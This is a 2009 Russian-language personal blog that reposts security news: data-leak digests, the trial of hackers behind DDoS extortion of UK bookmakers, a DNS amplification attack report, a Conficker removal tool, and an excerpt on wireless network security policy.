Yellow Ketchup

blondyn @ 2009-07-11T19:14:00

2009-07-12T00:14:57Z

Ooo

Apple отказалась размещать программу BitTorrent в App Store

2009-05-14T22:13:32Z

Apple отказал разработчику Maza Digital в размещении Drivetrain в App Store.

Drivetrain - программа удаленного управления для Transmission, BitTorrent клиента для Mac OS X и ряда других платформ.

Мотивировка исключения проста - программа часто обвиняется в пособничестве нарушению авторских прав. "Мы решили не публиковать этот тип приложения в App Store. Данная программа зачастую используется для целей, нарушающих права третьих компаний", - кратко заявили в Apple.

Впрочем, компания-разработчик файлообменного клиента утверждает, что логика Apple не выдерживает критики и что сами по себе BitTorrent клиент и протокол не нарушают авторских прав. Разработчик также отметил то, что сам Drivetrain не выполняет загрузку чего либо, а только позволяет пользователям управлять работой Transmission.

Обзор утечек: 27 апреля - 13 мая

2009-05-14T21:55:49Z

Аналитический центр компании Perimetrix представляет обзор утечек за период с 27 апреля по 13 мая. За это время в мире было зафиксировано не менее 7 масштабных инцидентов, в рамках которых могут пострадать более 9 млн. человек.

Главная утечка

Главная утечка отчетного периода на этот раз произошла в штате Вирджиния. Неизвестный хакер взломал несколько серверов министерства здравоохранения штата и скопировал приватную базу данных выписанных медицинских рецептов. Как указал сам злоумышленник, в его собственность попали более 8 млн. записей пациентов (каждая из них содержит номер социального страхования) и более 35 млн. назначений.

В письме хакера, опубликованном на портале Wikileaks.org, была указана сумма в $10 млн. – именно за такое вознаграждение мошенник согласился вернуть украденные сведения. Однако министерство здравоохранения штата сумело восстановить их самостоятельно и выплата компенсации хакеру, тем самым, потеряла всякий смысл. Но так или иначе, утечка все равно произошла и большинство жителей штата по-прежнему находятся под серьезной угрозой.

Тайнам «Газпрома» «утечь» не дали

Если в большинстве западных стран об утечках оповещают постфактум, то в России такие инциденты предотвращаются заранее. На прошлой неделе в сети появилось довольно редкое сообщение о «российской» утечке, которая могла бы произойти в компании «Газпром». Однако этому весьма печальному событию помешали сотрудники управления ФСБ.

7 мая тверской райсуд Москвы вынес приговор бывшему сотруднику департамента по нормативно-правовым вопросам компании "ТНК-ВР Менеджмент" Илье Заславскому и его брату Александру. Братья были признаны в попытке незаконного сбора сведений, составляющих коммерческую тайну ОАО «Газпром» и осуждены условно. Как сообщают российские СМИ, Заславские пытались приобрести у сотрудника партнера «Газпрома» некие конфиденциальные сведения, сначала за 500, а потом – уже за 5 тыс. долл. В результате, потенциальный инсайдер обратился в правоохранительные органы и братьев вскоре задержали.

По мнению аналитического центра Perimetrix, данный инцидент показывает отношение российских компаний к утечкам, и отсутствие правового поля для получения информации об истинном положении дел. Пока в нашей стране не будет принят закон об обязательном оповещении пострадавших, компании будут замалчивать свои ошибки и предъявлять публике лишь вылизанные success stories о задержаниях инсайдеров и лиц, которые хотели этих инсайдеров подкупить.

Еврокомиссия рассматривает строгий вариант закона об утечках

Тем временем, в Европе идет всеобщее обсуждение закона «об обязательном оповещении» пострадавших в результате утечек информации. В начале мая комиссар еврокомиссии по вопросам телекоммуникаций Вивиан Рединг (Viviane Reding) заявила, что еврокомиссия планирует принять «всеобъемлющий» норматив по данным вопросам до конца 2012 года. Предполагается, что в документе будут прописаны требования по оповещению жертв утечек для подавляющего большинства коммерческих организаций, агентств и госструктур.

Пока же комиссар планирует начать с малого и закрепить требование «обязательного оповещении» в новом законе, регулирующем деятельность европейских операторов связи.

Красивые цифры

317 писем за один день получила жительница английского города Эрит Сандра Грант (Sandra Grant) от банка Barclaycard. 55-летней женщине по ошибке была доставлена корреспонденция, которая была предназначена другим клиентам. Вполне естественно, что в каждом из доставленных писем была приватная финансовая информацию соответствующего клиента.

600 тысяч долл. с кредитных карт похитил сотрудник американской газовой заправки Гагик Урутян. По данным полиции, мошенник использовал кредитные данные клиентов для снятия денег в банкоматах сразу нескольких регионов – от штата Вирджинии и до штата Нью-Джерси.

Знаковые слова

«Вначале я некоторое паниковал, а затем – почувствовал отвращение к тем людям, которые позволили утечке произойти. После этого я пошел в банк и застраховал себя от риска мошенничества с моими персональными и медицинскими данными. Послушайте, эта утечка уже потребовала от меня финансовых затрат», - пациент больницы Бредфорда рассказывает о последствиях, к которым может привести потеря всего лишь одной флешки.

«ATTENTION VIRGINIA! I have your sh**! In *my* possession, right now, are 8,257,378 patient records and a total of 35,548,087 prescriptions. Also, I made an encrypted backup and deleted the original. Unfortunately for Virginia, their backups seem to have gone missing, too. Uhoh :(», - сообщение хакера-шантажиста, взломавшего медицинскую систему штата Вирджиния, пожалуй, не нуждается в переводе

Утечки, в которых пострадали как минимум 5 тысяч человек:

Организация: финансово-жилищное агентство штата Оклахома (Oklahoma Housing Finance Agency)
Пострадавшие: жители штата Оклахома, принимавшие участие в одной из программ агентства, в общей сложности 225К человек
Данные: ПД, SSN, tax identification numbers
Причина: корпоративный ноутбук сотрудника агентства был украден из его дома вместе с ювелирными украшениями, камерой, оружием и другим ноутбуком. Компьютер использовал двухуровневую парольную защиту – первый пароль был предназначен для доступа к ОС, а второй – для доступа к секретным файлам. По-видимому, информация была незашифрована
Референс: Laptop stolen with ID's of 225,000 Oklahomans

Организация: больница г. Бредфорда, Англия
Пострадавшие: пациенты госпиталя, в общей сложности 5,6К человек
Данные: медицинская информация
Причина: сотрудница госпиталя потеряла флешку с приватной информацией пациентов госпиталя в библиотеке. После того, как об утечке стало известно, она оставила свой пост
Референс: 5,600 patients' records 'lost' on memory stick

Организация: министерство здравоохранения штата Вирджиния (Virginia Department of Health Professions)
Пострадавшие: пациенты, приобретавшие медикаменты по рецептам, до 8М человек
Данные: ПД, SSN, а также медицинские назначения
Причина: хакерское вторжение в дата-центр министерства. Спустя несколько дней после вторжения на сайте Wikileaks было опубликовано письмо хакера, в котором тот требовал $10М за похищенную информацию
Референс: Virginia Department of Health Professions Refutes Hacker's Claim

Организация: компания LexisNexis, крупный агрегатор коммерческой информации и бизнес-данных
Пострадавшие:пользователи LexisNexis, 32К человек
Данные: номера кредитные карт
Причина: некоторые клиенты сервиса использовали его для изготовления поддельных кредитных карт. Деятельность мошенников была зафиксирована и остановлена еще в 2007 году, однако публичная информация об утечке появилась в сети только сейчас
Референс: LexisNexis says its data was used by fraudsters

Организация: Kapiolani Community College, американский колледж в Гонолулу, Гавайи
Пострадавшие: учащиеся колледжа, более 15К человек
Данные: ПД, SSN
Причина: компьютер с конфиденциальной информацией был заражен вредоносной программой. Эта программа обладала способностью копировать приватную информацию на сервера своих создателей
Референс: Security Breach Affects 15,487 KCC Students

Организация: Университет Калифорнии (Беркли)
Пострадавшие: студенты, в общей сложности 160К человек
Данные: ПД, SSN (для 97К записей), а также «не относящиеся к диагнозам и лечению» медицинские данные
Причина: вторжение «заокеанских» хакеров
Референс: UC hacking leaves thousands at risk of ID theft

Организация: избирательная комиссия округа Фултон, штат Джорджия
Пострадавшие: жители штата, до 100К человек
Данные: ПД, SSN и прочие данные – различная информация, которая содержалась в документах комиссии и избирательных бланках
Причина: избирательная комиссия не сочла нужным правильным образом утилизировать документы и просто выбросила их в мусорку
Референс: Georgia Voter Records Discarded

Test

2009-05-14T06:39:13Z

blondyn

Posted via LiveJournal.app.

Ru-Center разрешил аннулировать регистрацию доменов без решения суда

2009-05-13T20:44:14Z

"Региональный сетевой информационный центр" (регистратор Ru-Center) внес изменения в текст клиентского соглашения о регистрации доменных имен в зонах NET, COM, ORG, BIZ, INFO, CC, TV, ME. С 4 мая он сможет без решения суда останавливать работу сайтов, если сочтет их использование незаконным.

Согласно пункту 2.7 нового пользовательского соглашения, "делегирование домена может быть приостановлено, или регистрация доменного имени может быть аннулирована, или домен может быть передан иному регистратору" в целях "пресечения незаконной деятельности, деятельности, наносящей ущерб третьим лицам, а также деятельности, противоречащей общественным интересам, принципам гуманности и морали, оскорбляющей человеческой достоинство либо религиозные чувства", причем регистратор "вправе самостоятельно давать оценку деятельности Заказчика на предмет нарушения законодательства, в том числе в случаях, когда определение таких действий не закреплено нормативными актами".

В качестве готовых примеров незаконной деятельности, которая повлечет такие действия регистратора, упоминаются: распространение и реклама порнографии, призывы к насилию, экстремистской деятельности и свержению власти, приводится деятельности по распространению и рекламированию порнографических материалов, призывов к насилию, осуществлению экстремистской деятельности, свержению власти.

Стоит отметить, что регламент регистрации доменов в зоне RU таких вольностей не допускает (см. пункт 3.5.5), и для того, чтобы лишить администратора прав на домен, необходимо решение суда.

Зато претендентам на домены в зоне .РФ стоит приготовиться ко множеству ограничений. Помимо особого порядка регистрации, координационный центр домена RU использует "очень строгий" стоп-лист доменных имен. Кроме того, регистрация будет доступна только по паспорту.

Уголовный кодекс. Вырежи и сохрани!

2009-04-25T20:24:35Z

Уголовный кодекс. Вырежи и сохрани!

Статья 272. Неправомерный доступ к компьютерной информации. Наказывается сроком лишения свободы до пяти лет.
Статья 273. Создание, использование и распространение вредоносных программ для ЭВМ. Наказывается сроком лишения свободы от трех до семи лет.
Статья 274. Нарушение правил эксплуатации ЭВМ, системы ЭВМ или их сети. Наказывается сроком лишения свободы до четырех лет.

Атака на букмекеров

2009-04-25T20:17:05Z

Если ты читаешь эту статью, то наверняка словосочетание «компьютерный взлом» не является для тебя каким-то загадочным. Ты точно знаешь, что такое переполнение буфера, где хранит свои пароли популярный клиент ICQ и каким эксплойтом похоронить веб-форум. Но задумывался ли ты о возможном наказании? Скорее всего, широко улыбаясь, ты думал, что твоя жизнь и Уголовный кодекс – это две совсем разные реальности. Прости, но мне придется тебя переубедить…

С чего начинается кибертеррор

Тимур Арутчев - совсем не хакер. Он обычный житель провинциального города Пятигорска. Окончил Лингвистический университет, два года работал в Штатах. В совершенстве владеет английским и испанским языками. Во время описываемых событий – осенью 2003 года – Тимуру было 33 года.

Кто и когда рассказал ему о таком сомнительном виде бизнеса, как сетевой рэкет, неизвестно. Но идея шантажа компаний угрозами виртуальных атак показалась ему однозначно привлекательной.

Тимур ищет исполнителей, профессионалов в ИТ-деле. Находит он их на одном из хакерских форумов, знакомясь с юзером zet. Под этим ником скрывался Александр Петров. Петров родился и жил в Астрахани. Только что закончил Академию права и собирался работать в таможне. По иронии судьбы отцом Саши был начальник астраханского отдела «К».

Петров принимает предложение Арутчева, соглашаясь стать организатором DDoS-атак. Но в одиночку ему не справиться. Александр обращается за помощью к своим друзьям – Ивану Максакову из Балакова и Денису Степанову из Москвы. Двадцатидвухлетний Иван учился в Балаковском институте техники, технологии и управления. Несмотря на то что компьютер появился у него немногим больше двух лет назад, Иван хорошо разбирается в вопросах интернет-безопасности, и техническая сторона дела во многом держится на нем. Денис Степанов в среде питерских компьютерщиков вообще считается профессионалом. На одной из выставок высоких технологий он читал доклад о рекламе в интернете, написанный им для российской торгово-промышленной палаты. Поговаривали, что Дениса приглашали работать в крупную столичную фирму на должность коммерческого директора. Добился бы он успехов в коммерции – этого мы не знаем, но хакером Денис был определенно неплохим.

Помимо Степанова и Максакова, Петров приглашает в команду двух человек из Казахстана, чьи имена неизвестны до сих пор. Таким образом, отряд хакеров для интернет-войны сформирован.

Атака на букмекеров

В качестве главного объекта атак были выбраны букмекерские конторы Великобритании. Оно и понятно – ставки англичане делать любят, кроме того, деньжата у букмекеров всегда будут. Сам виртуальный рэкет типичен и даже немного банален.

В дождливый британский день на email веб-мастера сайта конторы приходит письмо: «Ваши серверы под угрозой. Не исключено, что сегодня неблагоприятная фаза Луны для работы Вашего сайта. Он может не работать. Но за энную сумму денег мы все исправим, починим - и будет счастье». Энная сумма – это от 5 до 50 тысяч долларов.

Так как Англия - страна продвинутая, то ставки большая часть людей предпочитает делать непосредственно в Сети, используя кредитные карты и электронные платежные системы.

Серверы валили по излюбленной и проверенной годами технологии - DDoS-атакой (Distributed Denial of Servise Attaks). Сеть компьютеров-ботов находилась в США, в Хьюстоне. Скорее всего, они были заражены троянскими программами. Предположительно, сеть зомбированных машин создал Максаков. Использовал ли он готовые решения или написал своего червя сам – неясно. В назначенный час все зараженные ПК начинали посылать пакеты на IP-адреса серверов, блокируя их работу.

Атаке подверглась и крупнейшая букмекерская контора Британии - Canbet Sports Bookmakers Ltd. Отказавшись заплатить 10 штук баксов, англичане получили полную неработоспособность серверов в дни чрезвычайно популярных скачек на Кубок Бридерса. День простоя стоил букмекерам около 200 тысяч долларов. Не видя иного выхода, бизнесмены заплатили.

Подобного рода атакам подверглись 8 британских букмекерских сайтов и онлайновых казино. Цифры, правда, называют разные. Доходит до 54 атак в 30 региональных сегментах глобальной сети, но это кажется малоправдоподобным. Денежные потери бизнесменов варьируются от 1 до 70 (!) миллионов долларов. Одна только фирма Blue Square Ltd. заявила об ущербе в более чем 1,3 миллиона.

Деньги переводились хакерам по системе Western Union. Сначала в Латвию, на подставных лиц, а уже оттуда - в Пятигорск. Там их получили Тимур Арутчев и его гражданская жена.

Операция «Каттерик»

После очередного вымогательства одна из компаний обратилась в полицию. К расследованию подключились ФБР и Интерпол. В конце концов, на одном из компьютеров бот-сети в Хьюстоне засветился российский IP. То ли Иван Максаков забыл включить прокси, то ли анонимные прокси-серверы дали сбой. Скотленд-Ярд обратился к МВД России, а здесь уже был задействован тот самый отдел «К».

Осенью 2004 года Иван Максаков и Денис Степанов были арестованы. На следствии говорилось, что на вычисление хакеров пришлось потратить около четырех месяцев. Астраханец Петров попался в начале 2005 года. Также в Латвии были задержаны подельники хакеров, участвовавшие в переводе денег. При всех арестах присутствовали представители британской полиции. Ходят слухи, что операция под кодовым названием «Каттерик» была под контролем у премьер-министра Великобритании Тони Блэра, сильно обеспокоенного неприятностями букмекерских контор. Двух жителей Казахстана взять не удалось – МВД этой страны проигнорировало запросы российской и британской сторон. Арутчева сначала не задержали, но об этом ниже.

В сентябре-октябре 2006 года состоялся самый скандальный судебный процесс из всех, что когда-либо проходили над «компьютерными» преступниками. Парней обвиняли по статьям 163 (вымогательство денежных средств в особо крупных размерах) и 273 (использование вредоносных программ). Каждому грозило по 15 лет лишения свободы. Надо оговориться, что описание создания и действий группы хакеров - это лишь пересказанная версия следствия. Верить ей или нет – дело твое.

Суд

Суд проходил в Саратовской области, в городе Балаково. Видимо, оперативники решили, что Иван Максаков - самый опасный из хакеров, и потому процесс проходил в его родном городе. Виртуальное дело и на суде оставалось таким же – фигурировали в основном ники подозреваемых: zet, xxx, lichno sam и прочие. Часть из них удалось персонифицировать, а часть так и осталась набором латинских букв. На суде было заявлено, что Арутчев и его жена были организаторами переговоров с компаниями и занимались собственно вымогательством, на парнях держалась техническая сторона. Сообщали даже о распределении ролей: Максаков делал вирусы, Петров давал команду бот-сети и т.д.

Поначалу следствие во многом держалось на показаниях Максакова, который подтвердил, что он с товарищами занимался DDоS-атаками. Но после Иван заявил, что, давая показания, он находился под психологическим давлением. Адвокат Максакова Петр Рябов рассказал, что в 2003 году его подзащитному действительно предлагали заняться сетевым рэкетом, но Иван отказался от подобного рода занятий.

Материалы дела, касающиеся Тимура Арутчева, выделили в отдельное уголовное дело. Тимур был объявлен в розыск в январе 2005 года. Об этом весьма его удивившем факте он узнал лишь полтора года спустя, когда нарушил правила дорожного движения и был остановлен инспектором ГИБДД. Все эти полтора года он жил по месту прописки в Пятигорске, ни от кого не скрывался и никаких повесток не получал. Узнав о суде в Балакове, Тимур приехал туда. На суде Арутчев заявил, что ни к какому кибертерроризму отношения не имеет, подсудимых видит впервые в жизни и что вообще сильно удивлен всей этой историей. Хакеры надеялись на показания Тимура, ведь Арутчева обвиняли в организации всей группы. А не будет же человек, неуверенный в своей невиновности, сам приезжать на суд и давать показания? Но Тимура повязали прямо в зале суда.

Основными доказательствами вины хакеров стали CD-диски с набором вирусных программ. Этого, согласись, маловато. Поэтому в день оглашения приговора, 3 октября, ребята были весьма спокойны и уверены в оправдательном вердикте.

Приговор ввел всех в состояние шока. 8 лет строгого режима. Каждому. И каждый же должен был выплатить еще 100 тысяч рублей в пользу государства…

В зале тихо плакала девушка Саши Петрова. Мать Максакова охранники с трудом оттащили от сына. Денис Степанов через адвокатов что-то пытался передать родственникам. Самый суровый приговор в истории мирового хакерства был оглашен.

Уголовный кодекс. Вырежи и сохрани!

Засудили?

Дело это совсем не однозначное, и возникает целый ряд вопросов. Из всех переводов денег – а как мы помним, хакеры заработали чуть ли не 4 миллиона долларов – был подтвержден только один, на 40 тысяч. И какое отношение они имеют непосредственно к хакерам, сказать сложно. На webmoney-кошелек Максакова действительно поступали деньги. Но, во-первых, суммы платежей были весьма скромными, а во-вторых, выписок со счетов Арутчева, Петрова или других, подтверждающих, что это именно они отправляли деньги, не имеется.

Как мы уже знаем, главные улики – найденные CD-диски. На диске, обнаруженном у Петрова, так и было маркером крупно выведено: «ХАКЕР». И программы, которые там содержались, были в своей массе вирусами под MS-DOS. Как с помощью такого набора софта заработать 4 миллиона, суд не объяснил. Но гораздо интереснее то, что у Максакова был найден диск с точно таким же набором программ! Очень странное совпадение, однако же.

В Сети создали сообщество zasudili.livejournal.com, где были представлены аргументы в защиту ребят. По рунету распространилось обращение друзей Саши Петрова, доказывающих абсурдность обвинения. В обращении было сказано, что компакт-диск был подброшен, а программы на нем – утилиты, написанные в 1995-1997 годах. И подобным софтом букмекеров не поломаешь.

На ребят оказывалось давление, а адвокат Петрова даже не приехал на оглашение приговора – не исключено, что под давлением органов. Защита хакеров указывает на смену экспертов во время суда. Первый эксперт доказывал бесполезность программ на пресловутом CD, а новый уже четко работал на следствие, утверждая, что (цитирую обращение) «от хакеров падают самолеты и взрываются АЭС».

Это еще не все. Дактилоскопическую экспертизу компакт-диска, со снятием отпечатков пальцев и прочим, не провели. Таким образом, доказательства, что диски действительно принадлежали хакерам, а не подброшены, предоставлены не были. Кроме того, вызывает удивление ажиотаж вокруг процесса. На оглашение приговора приехали представители всех шести федеральных каналов. Также присутствовали представители Великобритании. Друзья Петрова, говоря об этом, называют процесс «заказухой». Один из экспертов назвал это обращение «грустным бредом».

Для объективности изложу ниже его аргументы.

Нелояльности суда не было. Все заседания записывались на самые надежные носители – ноутбуки подсудимых.
Некомпетентность экспертов. Во время суда ни один довод экспертов не был опровергнут. Эксперты поясняли обвиняемым, где и на чем они прокололись. Уровень экспертов был очень высок.

Это основное. Еще там разносится «английский след» - мол, большие сроки не связаны с тем, что дело находилось под контролем Скотленд-Ярда, адвокаты упрекаются в некомпетентности в области компьютерных вопросов, и даже говорится пара слов о нашем журнале. «Хакер» называется провокаторским. Полностью мнение эксперта, согласного с приговором, можно прочесть на сайте www.ellf.ru.

Выдержки из приговора

Я бы рад согласиться с экспертом, но оставлю свое мнение при себе. А тебе предоставляю возможность «насладиться» некоторыми цитатами из приговора.

…запуск на зараженном компьютере SOKS

Все бы ничего, но обвинение даже не знает, как правильно пишется слово «SOCKS». Хотя, может, это всего лишь опечатка?

Nuker.Win32.DoS, Nuker.Win32.Divine («Лаборатория Касперского») - утилиты, отправляющие специально сформированные запросы на атакуемые компьютеры в сети, в результате чего атакуемая система прекращает работу, использующие уязвимости в программном обеспечении и операционных системах…

Ээээ… Нюкер.вин32.дос? Завалить работу серверов нюкером под 95-й маздай – это очень круто.

Вещественные доказательства по делу: компакт-диски, системный блок, 2 ноутбука, изъятые у подсудимых - уничтожить как орудия преступления…

Уничтожить. Интересно, как именно это было сделано. Их переплавили, что ли? И в чем повинны ноутбуки? Нельзя было просто отформатировать жесткий диск? Чем вообще опасны компьютеры, если их владельцы уже сидят в тюрьме? На вопрос журналистов о том, было ли у суда достаточно доказательств, эксперт Игорь Юрин ответил так:

«В ходе экспертиз мы обнаружили множество исходников вредоносных программ: антивирусные программы не детектируют их, но на их основе можно быстро создать новые вредоносные программы. Были найдены не только распространенные версии вредоносных программ, но и авторские разработки. Некоторые из них были представлены даже в нескольких версиях. Например, найдена совершенствуемая во времени последовательность версий бота (с исходниками), которая разрабатывалась и использовалась участниками истории».

Участники, кстати, и не отрицали. Да, у них были исходные тексты некоторых программ. Но они пользовались ими исключительно для ознакомления, а не для вреда другим пользователям. Хранение программ - это единственное, что согласились признать хакеры из всего приговора. Что ж, суду оказалось достаточно.

Постскриптум

Эта история - не плод больного воображения. Это наши дни, это наша страна. А эти парни – обыкновенные компьютерщики, каких немало. Хакерство - не игрушки. За него действительно можно сесть в тюрьму. На троих Петров, Степанов и Максаков получили 24 года лишения свободы. А твоя болваночка с модифицированными эксплойтами по-прежнему лежит на самом видном месте рабочего стола?

Материалы, использованные автором при работе над статьей:

Автор: Илья Александров

Stinger for W32/Conficker

2009-04-25T19:43:48Z

Обновилась бесплатная анти вирусная утилита, с помощью которой можно обнаружить и удалить червь Conficker, также известный как Downadup и Kido. Этот червь распространяется посредством уязвимости в службе Windows RPC Server. Червь отличается тем, что его достаточно сложно удалить из зараженной системы, поскольку после попадания на компьютер он блокирует большинство антивирусных сайтов, а также отключает систему Windows Update.

Программа имеет простенький интерфейс, а процесс сканирования файлов на диске не нагружает систему. Stinger for W32/Conficker отличается небольшим размером и не требует инсталляции, благодаря чему программу можно запускать с USB-накопителя.

Размер: 1,43 Мб

Лицензия: беcплатно

URL адреса:

И где мы?

2009-03-31T06:05:33Z

Sign by Danasoft - For Backgrounds and Layouts

Киберпреступники осваивают новую разновидность DDoS-атак

2009-02-10T09:55:43Z

Во второй половине января провайдер ISPrime подвергся распределённой DoS-атаке нового вида, получившей название DNS Amplification («DNS-усиление»). Атака, как выяснилось, была заказана владельцами порносайта, которые хотели задавить конкурента, хостившегося на ISPrime.Через день атака повторилась и продлилась в течение трёх суток.

Как заявил Фил Розенталь (Phil Rosenthal), технический директор ISPrime, всего 2’000 компьютеров-«зомби» смогли полностью наводнить своими фальшивыми пакетами сеть ISPrime, используя для этого 750'000 вполне легитимных серверов DNS по всему миру.

Алгоритм атаки DNS Amplification отличается изощренностью. Используя недавно найденную уязвимость во многих серверах DNS, компьютер по команде злоумышленника может отправить на официальный DNS-сервер небольшой пакет размером, скажем, в 17 байт. В ответ DNS-сервер отправляет пакет размером уже около 500 байт. Подменяя адрес источника своего пакета, злоумышленник может направить огромный поток никому не нужных данных на любой выбранный адрес в сети свой жертвы.

Причем новой атаке жертве нечего противопоставить. Защититься от нее можно только вместе с провайдерами. Если владельцы DNS-серверов не устранят уязвимость в своей системе, то их клиенты останутся беззащитными перед лицом таких мощных и разрушительных атак.

Киберпреступники, сдающие в аренду свои ботнеты, уже предлагают услуги по атаке сайтов, причем продают эти услуги по принципу аукциона – кто больше заплатит. За использование алгоритма DNS Amplification ботнетчики требуют оплату, как за дополнительную услугу. Эксперты из компании SecureWorks, расследующие инцидент, считают, что в случае с компанией ISPrime использовалась именно такая сеть компьютеров-«зомби». Оператор конкурирующего сайта заказал атаку у владельцев одного из ботнетов.

Универсального лекарства от атаки DNS Amplification пока не существует. Тем не менее, организация DNS-OARC (Operations Analysis and Research Center) уже выпустила рекомендации по защите серверов на платформе BIND DNS от использования в таких атаках. Компания Microsoft пока не опубликовала указаний, как избежать подобных атак в ее продуктах, однако общие рекомендации по развертыванию защищенных DNS-серверов на базе продуктов Microsoft можно найти, например, на сайте technet.microsoft.com.

Политика безопасности беспроводных сетей

2009-02-10T09:53:07Z

Сергей Гордейчик (gordey@ptsecurity.ru)
Владимир Дубровин (3APA3A@SECURITY.NNOV.RU)

Главы из книги «Безопасность беспроводных сетей»
http://www.sprinter.ru/books/1946896.html

При построении системы обеспечения безопасности важно определить модель угроз, т.е. решить, чему собственно защита будет противостоять. По сути, в беспроводных сетях угрозы две: несанкционированное подключение и прослушивание, но их список можно расширить, выделить следующие основные угрозы, связанные с беспроводными устройствами:

неконтролируемое использование и нарушение периметра;
несанкционированное подключение к устройствам и сетям;
перехват и модификация трафика;
нарушение доступности;
позиционирование устройства.

Широкое распространение беспроводных устройств и их небольшая стоимость приводят к тому, что в периметре сетевой безопасности возникают бреши. Здесь речь идет не только о злоумышленниках, подключивших КПК с поддержкой Wi-Fi к проводной сети компании, но и о более тривиальных вещах. Активный беспроводной адаптер на подключенном к корпоративной сети ноутбуке, принесенная из дома для тестирования точка доступа - все это может стать удобными каналами для проникновения во внутреннюю сеть.

Недостаточная аутентификация, ошибки в системе разграничения доступа позволяют осуществлять несанкционированное подключение. Различные методы атак на Bluetooth и Wi-Fi, направленные на реализацию этих угроз, будут рассмотрены в этой и последующих главах книги.

Специфика беспроводных сетей подразумевает, что данные могут быть перехвачены и изменены в любой момент. Для одних технологий достаточно стандартного беспроводного адаптера, для других требуется специализированное оборудование. Но в любом случае, эти угроза реализуются достаточно просто, и для противостояния им требуются эффективные криптографические механизмы защиты данных.

По своей природе беспроводные сети не могут обеспечивать высокую доступность. Различные природные, техногенные и антропогенные факторы могут эффективно нарушать нормальное функционирование радиоканала. Этот факт должен учитываться при проектировании сети, и беспроводные сети не должны использоваться для организации каналов при высоких требованиях по доступности.

Станции Wi-Fi могут быть легко обнаружены пассивными методами, что позволяет с достаточно большой точностью определять местоположение беспроводного устройства. Например, система Navizon может использовать для определения местоположения мобильного устройства систему GPS, базовые станции GSM и точки беспроводного доступа. Что касается Bluetooth, то использованию этой технологии для определения местоположения владельца мобильного телефона (к примеру) посвящен ряд серьезных работ. Те, кому интересны эти проблемы, могут начать ознакомление с ними с публикаций Джозефа Хэллберга (Josef Hallberg) и Маркус Нильсона (Marcus Nilsson) «Positioning with Bluetooth» и Силке Фельдман с коллегами «An indoor Bluetooth-based positioning system: concept, Implementation and experimental evaluation».

Политика безопасности в отношении беспроводных сетей может быть представлена как в виде отдельного документа, так и в составе других составляющих нормативного обеспечения безопасности. В большинстве случаев наличие отдельного документа не требуется, поскольку положения политики в отношении беспроводных сетей во многом пересекаются с традиционным содержанием подобных документов. Так, например, требования по физической защите точек доступа вполне перекрываются вопросами физической безопасности активного сетевого оборудования. В связи с этим в виде отдельного документа политика беспроводной безопасности представлена в период внедрения WLAN, после чего, при очередном пересмотре документов гармонично вливается в другие.

Если беспроводные сети не используются, то политика безопасности должна включать в себя описание защитных механизмов, направленных на снижение рисков, связанных с несанкционированным использованием радиосетей. В основном здесь перечисляются те технологии, самовольное использование которых недопустимо, и описываются механизмы защиты, направленные на выполнение требований. Например, для снижения вероятности нарушения политики могут быть использованы механизмы защиты, приведенные в табл. 2.1. Здесь и далее положения политики безопасности (также называемой концепцией, основной политикой) приведены совместно с возможным содержанием требований безопасности (функциональная политика).
Основные положения политики безопасности беспроводных сетей

Положения политики	Требования к безопасности
Обучение пользователей и администраторов ISO\|IEC 27001 A.8.2.2	Пользователи должны знать и понимать изложенные в политике ограничения, а администраторы должны иметь необходимую квалификацию для предотвращения и обнаружения нарушений политики
Контроль подключений к сети ISO\|IEC 27001 A.11.4.3	Уровень риска, связанного с подключением несанкционированной точки доступа или клиента беспроводной сети, можно снизить путем отключения неиспользуемых портов коммутаторов, фильтрации по MAC-адресам (port-security), аутентификации 802.1X, систем обнаружения атак и сканеров безопасности, контролирующих появление новых сетевых объектов
Физическая безопасность ISO\|IEC 27001 A.9.1	Контроль приносимых на территорию устройств позволяет ограничить вероятность подключения к сети беспроводных устройств. Ограничение доступа пользователей и посетителей к сетевым портам и слотам расширения компьютера снижает вероятность подключения беспроводного устройства
Минимизация привилегий пользователя ISO\|IEC 27001 A.11.2.2	Если пользователь работает на компьютере с минимально необходимыми правами, то снижается вероятность самовольного изменения настроек беспроводных интерфейсов
Контроль политики безопасности ISO\|IEC 27001 6, A.6.1.8	Средства анализа защищенности, такие как сканеры уязвимостей, позволяют обнаруживать появление в сети новых устройств и определить их тип (функции определения версий ОС и сетевых приложений), а также отслеживать отклонения настроек клиентов от заданного профиля. Техническое задание на проведение работ по аудиту внешними консультантами должно учитывать требования политики в отношении беспроводных сетей
Инвентаризация ресурсов ISO\|IEC 27001 A.7.1.1	Наличие актуального обновляемого списка сетевых ресурсов облегчает обнаружение новых сетевых объектов
Обнаружение атак ISO\|IEC 27001 A.10.10.2	Применение систем обнаружения атак как традиционных, так и беспроводных дает возможность своевременно определять попытки несанкционированного доступа
Расследование инцидентов ISO\|IEC 27001 A.13.2	Инциденты, связанные с беспроводными сетями мало отличаются от других подобных ситуаций, однако процедуры их расследования должны быть определены

Для сетей, где беспроводные сети внедряются или используются, может потребоваться внесение дополнений в разделы политики, приведенные в таблице 2.2.

Таблица 2.2. Положения политики безопасности беспроводных сетей

Положения политики	Требования к безопасности
Нормативно-правовое обеспечение ISO\|IEC 27001 A.15.1.1	Использование беспроводных сетей может попадать под действие как российских, так и международных нормативных актов. Так, в России использование частотного диапазона 2,4 ГГц регулируется решением ГКРЧ от 6.11.2004 (04-03-04-003). Кроме того, поскольку в беспроводных сетях интенсивно используется шифрование, а применение криптографических средств защиты в ряде случаев попадает под довольно жесткие законодательные ограничения, необходимо проработать и этот вопрос
Внутренний и внешний аудит ISO\|IEC 27001 6, A.6.1.8	При проведении работ по оценке защищенности должны учитываться требования политики в отношении беспроводных сетей. Более подробно возможный состав работ по оценке защищенности WLAN описан в последней глава данной книги
Разделение сетей ISO\|IEC 27001 A.11.4.5	В связи со спецификой беспроводных сетей желательно выделять точки беспроводного доступа в отдельный сетевой сегмент с помощью межсетевого экрана, особенно когда речь касается гостевого доступа
Использование криптографических средств защиты ISO\|IEC 27001 A.12.3	Должны быть определены используемые протоколы и алгоритмы шифрования трафика в беспроводной сети (WPA или 802.11i). При использовании технологии 802.1X определяются требования к протоколам ЭЦП и длине ключа подписи сертификатов, используемых для различных целей
Аутентификация ISO\|IEC 27001 A.11.4.2	Должны быть определены требования к хранению данных аутентификации, их смене, сложности, безопасности при передаче по сети. Могут быть явно определены используемые методы EAP, методы защиты общего ключа сервера RADIUS
Контроль изменений в информационной системе ISO\|IEC 27001 A.12.5.1	Должны учитываться используемые в ИС беспроводные технологии.
Допустимость использования программного и аппаратного обеспечения. ISO\|IEC 27001 A.12.4.1	В этом разделе рассматриваются требования к точкам доступа, беспроводным коммутаторам и клиентам беспроводной сети.
